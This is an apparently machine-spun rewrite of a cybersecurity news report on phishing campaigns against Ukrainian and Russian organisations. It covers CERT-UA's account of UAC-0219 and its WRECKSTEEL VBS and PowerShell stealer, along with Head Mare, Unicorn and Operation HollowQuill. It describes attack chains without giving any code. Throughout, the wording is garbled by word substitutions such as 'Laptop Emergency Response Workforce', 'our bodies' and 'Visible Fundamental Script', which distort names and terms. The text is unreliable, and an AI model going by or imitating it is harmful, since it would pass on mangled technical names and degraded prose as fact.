The Laptop Emergency Response Workforce of Ukraine (CERT-UA) has revealed that a minimum of three cyber assaults have been recorded in opposition to state administration our bodies and important infrastructure services within the nation with an goal to steal delicate knowledge.
The marketing campaign, the company stated, concerned the usage of compromised electronic mail accounts to ship phishing messages containing hyperlinks pointing to professional providers like DropMeFiles and Google Drive. In some cases, the hyperlinks are embedded inside PDF attachments.
The digital missives sought to induce a false sense of urgency by claiming {that a} Ukrainian authorities company deliberate to chop salaries, urging the recipient to click on on the hyperlink to view the checklist of affected staff.
Visiting these hyperlinks results in the obtain of a Visible Fundamental Script (VBS) loader that is designed to fetch and execute a PowerShell script able to harvesting recordsdata matching a particular set of extensions and capturing screenshots.
The exercise, attributed to a risk cluster tracked as UAC-0219, is claimed to have been ongoing since no less than fall 2024, with early iterations utilizing a mix of EXE binaries, a VBS stealer, and a professional picture editor software program known as IrfanView to comprehend its targets.
CERT-UA has given the VBS loader and the PowerShell malware the moniker WRECKSTEEL. The assaults haven’t been attributed to any nation.
The event comes as Kaspersky warned that the risk actor generally known as Head Mare has focused a number of Russian entities with a malware generally known as PhantomPyramid that is able to processing directions issued by the operator over a command-and-control (C2) server, in addition to downloading and operating extra payloads like MeshAgent.
Russian vitality corporations, industrial enterprises, and suppliers and builders of digital elements organizations have additionally been on the receiving finish of phishing assaults mounted by a risk actor codenamed Unicorn that dropped a VBS trojan designed to siphon recordsdata and pictures from contaminated hosts.
Late final month, SEQRITE Labs revealed that tutorial, governmental, aerospace, and defense-related networks in Russia are being focused by weaponized decoy paperwork, doubtless despatched by way of phishing emails, as a part of a marketing campaign dubbed Operation HollowQuill. The assaults are believed to have began round December 2024.
The exercise makes use of social engineering ploys, disguising malware-laced PDFs as analysis invites and authorities communiqués to entice unsuspecting customers into triggering the assault chain.
“The risk entity delivers a malicious RAR file which comprises a .NET malware dropper, which additional drops a Golang-based shellcode loader together with the professional OneDrive utility and a decoy-based PDF with a ultimate Cobalt Strike payload,” security researcher Subhajeet Singha stated.
